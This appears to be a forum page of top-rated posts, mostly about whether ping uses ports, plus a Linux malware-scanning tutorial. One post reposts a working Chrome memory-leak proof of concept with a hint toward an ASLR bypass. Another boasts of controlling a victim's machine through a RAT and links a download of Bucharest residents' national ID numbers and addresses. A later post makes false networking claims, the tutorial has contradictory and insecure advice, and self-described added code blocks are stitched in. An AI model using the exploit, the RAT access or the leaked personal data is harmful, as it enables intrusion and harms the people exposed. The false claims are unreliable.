
Leaderboard

Popular Content

Showing content with the highest reputation on 02/23/17 in all areas

  1. Yes, I had a discussion with a colleague too and I looked over the RFC that defines the IP protocol, and the port terminology is not used. However, theoretically speaking, it is still a port (of the IP protocol). We are used to the classic definition of a port: a 16-bit number, blah blah. But in essence, ports are used for multiplexing the data flow. More precisely, some data arrives on port 80, other data on port 25, etc. (multiplexing). In this case, the multiplexing does not refer to a port used by a particular program (like TCP 80 by Apache), but to a port that indicates, as the standard puts it, the "next higher level protocol". In other words, this IP protocol/port does not distinguish between the programs the data has to reach, but between the "<<programs>>" that process the protocol, such as TCP/UDP/ICMP. In this case the "programs" are the pieces of code that handle the processing of the next protocols. Well, I don't know if I explained it properly.
    3 points
  2. LOL
      root # tcpdump -nnvXSs 1514 -c1 icmp
      tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 1514 bytes
      23:11:10.370321 IP (tos 0x20, ttl 48, id 34859, offset 0, flags [none], length: 84) 69.254.213.43 > 72.21.34.42: icmp 64: echo request seq 0
          0x0000:  4520 0054 882b 0000 3001 7cf5 45fe d52b  E..T.+..0.|.E..+
          0x0010:  4815 222a 0800 3530 272a 0000 25ff d744  H."*..50'*..%..D
          0x0020:  ae5e 0500 0809 0a0b 0c0d 0e0f 1011 1213  .^..............
          0x0030:  1415 1617 1819 1a1b 1c1d 1e1f 2021 2223  .............!"#
          0x0040:  2425 2627 2829 2a2b 2c2d 2e2f 3031 3233  $%&'()*+,-./0123
          0x0050:  3435 3637                                4567
      PING -> ICMP. You can't ping a port. As @u0m3 also said, when someone says they are pinging port x they mean TCP / UDP (layer 4), to see whether that port is open / closed. More generally, when someone "pings port 80" it means they send a TCP SYN to that system to see whether it replies or not (ACK). The real, original PING uses ICMP, which does not use ports at all (ports are irrelevant at the Internet layer).
    3 points
  3. .ipsType_light a { font-size: 20px !important; font-weight: bold !important; }
      For those with bad eyesight...
    2 points
  4. Someone said above: Layer 4 is an old woman walking along with her bags on her back. Layer 3 sees her and says: Hey, what the hell have you got in those bags? What are you carrying in there? :))))
    2 points
  5. Complete list: http://www.iana.org/assignments/protocol-numbers/protocol-numbers.xml#protocol-numbers-1
    2 points
  6. I saw it on Twitter, I didn't know the answer. It's a networking question. What port does ping use?
    1 point
  7. (o.O) If by PING you mean checking whether a TCP port is open (which is not called PING, as @MrGrj also explained) then you have nothing to do with SSL/TLS. See the explanation below:
      PING - ICMP Echo - works at Layer 3 in the OSI model (Network Layer) and Layer 2 in TCP/IP (Internet Layer)
      TCP scan - SYN scan (for example) - works at Layer 4 in the OSI model (Transport Layer) and Layer 3 in TCP/IP (Host-to-Host Transport Layer)
      SSL/TLS is implemented at Layer 5 in OSI (Session Layer) and at Layer 4 in TCP/IP (Application Layer)
    1 point
  8. Hint: what you want to do is called concatenation. You are already doing it here:
      "https://blockchain.info/q/getreceivedbyaddress/".$btcaddress
      That is:
      "text" . $variabila
      And what you need is:
      "text" . $variabila . "more text"
      Respectively:
      $mech->get("https://blockexplorer.com/api/addr/".$btcaddress . "/balance");
    1 point
  9. You guys are hopeless :))) udp = 17, tcp = 6, icmp = 1. When you play with sockets, how the hell do you define them?
    1 point
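      Parsing the dump quoted in post 2 with the protocol numbers from post 9 shows in code what posts 1, 2 and 9 describe: the IPv4 header's protocol field is the demultiplexer that selects the next protocol, and an ICMP echo request carries no port fields at all. This is an added Python example, not code from any of the posts; the hex bytes are copied from the tcpdump output in post 2 and the protocol table from post 9.

```python
import struct
from ipaddress import IPv4Address

# Hex columns copied from the tcpdump -X output quoted in post 2 (an 84-byte ICMP echo request).
DUMP = """
4520 0054 882b 0000 3001 7cf5 45fe d52b
4815 222a 0800 3530 272a 0000 25ff d744
ae5e 0500 0809 0a0b 0c0d 0e0f 1011 1213
1415 1617 1819 1a1b 1c1d 1e1f 2021 2223
2425 2627 2829 2a2b 2c2d 2e2f 3031 3233
3435 3637
"""
# IANA protocol numbers from post 9: the values of the IPv4 "next higher level protocol" field.
PROTOCOLS = {1: "ICMP", 6: "TCP", 17: "UDP"}


def ip_checksum(header: bytes) -> int:
    """RFC 1071 one's-complement sum over a header; 0 means the stored checksum is valid."""
    total = sum(struct.unpack("!%dH" % (len(header) // 2), header))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def parse_packet(hexdump: str) -> dict:
    """Decode the IPv4 header, then demultiplex on the protocol field as a host's IP layer does."""
    raw = bytes.fromhex("".join(hexdump.split()))
    ver_ihl, _tos, length, ident, _frag, ttl, proto, _csum, src, dst = struct.unpack(
        "!BBHHHBBH4s4s", raw[:20])
    ihl = (ver_ihl & 0x0F) * 4
    info = {
        "version": ver_ihl >> 4, "ttl": ttl, "id": ident, "length": length,
        "protocol": PROTOCOLS.get(proto, str(proto)),
        "src": str(IPv4Address(src)), "dst": str(IPv4Address(dst)),
        "checksum_ok": ip_checksum(raw[:ihl]) == 0,
        "ports": None,
    }
    payload = raw[ihl:]
    if proto == 1:
        # ICMP: type, code, checksum, then (for echo) identifier and sequence. There is no port field.
        icmp_type, code, _c, icmp_id, seq = struct.unpack("!BBHHH", payload[:8])
        info.update(icmp_type=icmp_type, code=code, icmp_id=icmp_id, seq=seq)
    elif proto in (6, 17):
        # TCP and UDP both begin with 16-bit source and destination ports; "ping on port 80" lives here.
        info["ports"] = struct.unpack("!HH", payload[:4])
    return info


if __name__ == "__main__":
    for key, value in parse_packet(DUMP).items():
        print(f"{key:>12}: {value}")
```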
  10. <!-- Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1024
      Chrome bug: https://bugs.chromium.org/p/chromium/issues/detail?id=671328
      PoC: -->
      <style> content { contain: size layout; } </style>
      <script>
      function leak() {
        document.execCommand("selectAll");
        opt.text = "";
      }
      </script>
      <body onload=leak()>
      <content>
      <select>
      <option id="opt">aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa</option>
      </select>
      </content>
      <!-- Since this is a layout bug AFAIK the leaked data can't be obtained via DOM calls, however it's possible to obtain it using tricks like unicode-range CSS descriptor (credits to Jann Horn for coming up with that approach) which is likely sufficient to turn this into an ASLR bypass. -->
      Source: https://www.exploit-db.com/exploits/41434/
    1 point
  11. I'm dumb, delete please
    1 point
  12. When connecting to the Internet there are many malicious threats which can harm the data on your computer. The Operating System (OS) can become inoperable and require re-installation. The OS and data can be restored from a backup if you are able to perform backups of the OS and data. New threats appear on the Internet daily. Most people think that if they run Linux then they are free from such troubles. It is true that most of the threats out there are Windows based. What most people do not understand is that 90% of all high-end servers are running Linux. Since more of the high-end servers are Linux there are more threats being made against Linux.

      So, what is a threat? Malware and the like…

      Malware is composed of many things. Malware consists of viruses, trojans, worms and more. All a user needs to know is that their system is free of Malware. To find Malware a scanning program will look over specified folders and/or files. When the program scans, it is looking for signatures. A signature is made from a bit of unique code from Malware. The code is then hashed and placed in a database. The scanning program gets the hash from the database and looks through files to see if the hash exists. If the signature is found then the scanning program can alert the user that a threat has been found. The current Linux Malware Detect signature database contains 5,657,522 signatures. Some people will take an existing Malware program and use it as a basis for a new one. Since some of the code remains intact, the signature is the same for the new Malware. When an existing signature finds a new piece of Malware it is deemed a Heuristic or Generic Detection. Having the same signature as an existing Malware makes the new Malware within the same family. A completely new piece of Malware will most likely create a new signature. New signatures will cause the database to be updated. The number of Malware is increasing and the databases are updated constantly. When you have a program to scan your system then you will have new signature database updates often.

      NOTE: It is possible for a scanner to find a signature match to a file which is not Malware. This match is a false positive. The reverse is true as well. If a new Malware package has been released and is not in the database then the scanner will return a false negative. For this reason the signature database needs to be updated as often as possible.

      Let's look at an example of Malware.

      Malware Example

      The list of Malware is quite extensive, especially getting into the whole family of a single signature. Choosing Malware to use as an example can be quite easy because of the number of existing samples. So, let's look at 'Linux.Encoder.1'. The Malware is also known as 'Elf/Filecoder/A' and 'Trojan.Linux.Ransom.A'. The family of these types is extensive. The way it works is that it gets into your system attached to a file downloaded from the Internet. Once on your system it will become active and place a 'readme' file in every folder on the system. Other data on the system will be encrypted, keeping you from accessing the true contents of the files. The 'readme' files contain information on how your data is being held captive and that you must pay a ransom to have the files decrypted. When the files were encrypted, a key was sent to the server of the Malware creators. Once you pay the ransom it demands, if one was specified, then your data will be restored. A company named BitDefender has the ability to decrypt the files on your system and remove the ransomware Malware. As usual, it is very important to keep your signature database up-to-date. Before you can perform updates you do need to have the scanner installed. One good scanner used by the Linux Malware Detect program is ClamAV.

      Install ClamAV

      The ClamAV program can be installed through the standard repository for both Red Hat and Debian systems. For Red Hat systems perform the following:
          yum -y install clamav clamav-devel clamav-update
      Once installed you will need to edit the file '/etc/clamav/freshclam.conf'. About seven lines down is a line which is 'Example'. The line needs to have a '#' placed at the beginning to make '#Example'. Further down is a line which starts with '#DatabaseDirectory' with a folder following it. Remove the pound sign (#) at the beginning to uncomment the line. Another line which can be added at the bottom of the file is 'DatabaseMirror database.clamav.net'. Save the file and in a Terminal you will need to issue the following command:
          sudo chmod -R 777 /usr/lib/clamav
      You should be able to issue the command 'freshclam' in a Terminal to update the database of ClamAV. On a Debian system you need to issue the following command:
          sudo apt-get install -y clamav
      ClamAV should update automatically every hour by default. The database is locked if you try to perform a 'freshclam' command to perform an update. Now that the scanner is installed you need to install the LMD definitions and program.

      LMD Installation

      Whether in Debian or Red Hat the install will be the same. Perform the following commands in a Terminal.
          cd /tmp
          wget http://www.rfxn.com/downloads/maldetect-current.tar.gz
          tar -xvf maldetect-current.tar.gz
          ls -l | grep maldetect
      The last command will give you a listing of the files and folders with 'maldetect' in the name. You should have one similar to 'maldetect-1.5'.
          cd maldetect-1.5   [or whatever the name of the folder was in the previous step]
          sudo ./install.sh
      Now you will need to configure maldetect to work with the ClamAV Scanner by editing the file '/usr/local/maldetect/conf.maldet'. You need to look for a line which starts with 'scan_clamscan' and make sure it is set to '"1"'. If you want maldetect to automatically quarantine found items set 'quarantine_hits' to a value of '1'. To clean the Malware found set the 'quarantine_clean' value to '1'. If you want to allow user scans to be performed without root access you can change the 'scan_user_access' value to '1'. Save the file and exit the editor.

      NOTE: Since you installed ClamAV first, maldetect should already have the scanner setting set to '1'. If not, make sure you change it.

      To scan all files on your system perform the command from a Terminal:
          sudo maldet -a /
      A scan will be performed as shown in Figure 1. Maldetect will load the signatures and use the ClamAV scanner to perform the scan for the signatures in the signature file. Results of a scan are placed in a report. A report number, or SCANID, is displayed at the end of the scan. To see the report use the command 'maldet --report SCANID'.

      FIGURE 1

      In Figure 1 the scan which was just performed created a report with the SCANID of '170125-1736.1777'. To see the specific report use the command 'maldet --report SCANID'. In the case of the scan in Figure 1 the command to see the report would be 'maldet --report 170125-1736.1777'. To see a list of all reports use the command 'maldet -e list' as shown in Figure 2.

      FIGURE 2

      To restore quarantined files found during a scan use the command:
          maldet -s SCANID
      As you can see from Figure 2 there have been three scans performed. The scan with the SCANID of '170124-2248.22401' had six hits. This means it found six infected files on the scan it performed. Using the command 'maldet --report 170124-2248.22401' would show results as seen in Figure 3.

      FIGURE 3

      The main things to look at are the following lines:
          {HEX}gzbase64.inject.unclassed.15 : /tmp/maldetect-1.5/files/clean/gzbase64.inject.unclassed
          {HEX}gzbase64.inject.unclassed.15 : /tmp/maldetect-current.tar.gz
          {CAV}Win.Adware.Opencandy-78 : /media/jarret/BookC/Desktop (items)/Windows/SetupImgBsajbdfjaibufibjvSurn_2.5.8.$
          {CAV}Win.Adware.Opencandy-78 : /media/jarret/BookC/Desktop (items)/Windows/SetupImgBurn_2.5.8.0.exe
          {HEX}gzbase64.inject.unclassed.15 : /tmp/maldetect-1.5/files/clean/gzbase64.inject.unclassed
          {HEX}gzbase64.inject.unclassed.15 : /tmp/maldetect-current.tar.gz
      Lines 1, 2, 5 and 6 are positive matches found for the maldetect files. The compressed files containing the installation code and the signature database (lines 2 and 6) are noted as being infected. The scanner also detected the signature database itself in lines 1 and 5. Lines 3 and 4 are a Malware called Win.Adware.Opencandy-78. Within the report you can also see that no files were quarantined since the quarantine has not been enabled.

      NOTE: Do not run the scans and never check the reports. I have seen large companies do such a thing and find out that a virus was not being quarantined. Since it was not removed the virus was able to spread and cause problems.

      As noted at one point in the report, you can manually override the quarantine to occur by using the command 'maldet -q SCANID'. So, if I issue the command 'maldet -q 170124-2248.22401' as seen in Figure 4, the infected files will be quarantined.

      FIGURE 4

      Nothing of note occurs when removing the malware which was found during a scan.

      NOTE: If you do not enable public scanning then you must run 'maldet' as sudo.

      Be aware of the threats on the Internet. Keep in mind to always update your signature database as often as you can. Scan your system often. I hope this article can save you trouble in the future. Happy scanning!
    1 point
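      The article's NOTE describes scans that report hits nobody quarantines; the check below reads a conf.maldet file and flags any of the three settings the article tells you to enable (scan_clamscan, quarantine_hits, quarantine_clean) that is not "1". This is an added shell example, not part of the article or of LMD; the config excerpt is constructed, and on a real host the file to audit is the /usr/local/maldetect/conf.maldet path the article names.

```shell
#!/bin/sh
# Constructed conf.maldet excerpt in the file's key="value" style (quarantine left off on purpose).
SAMPLE_CONF="${TMPDIR:-/tmp}/conf.maldet.sample"
cat > "$SAMPLE_CONF" <<'EOF'
# constructed excerpt, not a real installation's file
scan_clamscan="1"
quarantine_hits="0"
quarantine_clean="0"
scan_user_access="0"
EOF

# conf_value FILE KEY -> prints KEY's value with surrounding quotes stripped, empty if absent.
conf_value() {
    sed -n "s/^[[:space:]]*$2=\"\{0,1\}\([^\"]*\)\"\{0,1\}.*/\1/p" "$1" | tail -n 1
}

# audit_maldet_conf FILE -> prints one line per setting that is not "1".
# Return value is the number of such settings; 0 means hits will be scanned, quarantined and cleaned.
audit_maldet_conf() {
    bad=0
    for key in scan_clamscan quarantine_hits quarantine_clean; do
        val=$(conf_value "$1" "$key")
        if [ "$val" != "1" ]; then
            echo "$key is '${val:-unset}', expected 1 (hits would be reported but not acted on)"
            bad=$((bad + 1))
        fi
    done
    return "$bad"
}

audit_maldet_conf "$SAMPLE_CONF" || echo "$? setting(s) need attention in $SAMPLE_CONF"
```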
  13. 1,200 free online courses from world-renowned universities, to help you develop the passion you want to turn into a profession. http://www.openculture.com/freeonlinecourses
    1 point
  14. So I caught someone in my RAT who had an interesting piece of software on the desktop; I tried it and it was pretty good, it found people in Bucharest: Last name, First name, CNP, Street, Number, Block, Floor, Apartment, Sector. Scan: VirusTotal - Free Online Virus, Malware and URL Scanner. Download (unarchived it is 300 MB): http://fisierulmeu.ro/63OYJCBSBALR/Politie-Bucuresti-rar.html
    1 point
  15. tvparnaie.ro
    1 point
  16. Ping can have any port. It depends on what you want to ping. Example: if you want to ping a website it will use port 80 or 8080. And for TCP/UDP ping between devices, port 0 is used.
    -1 points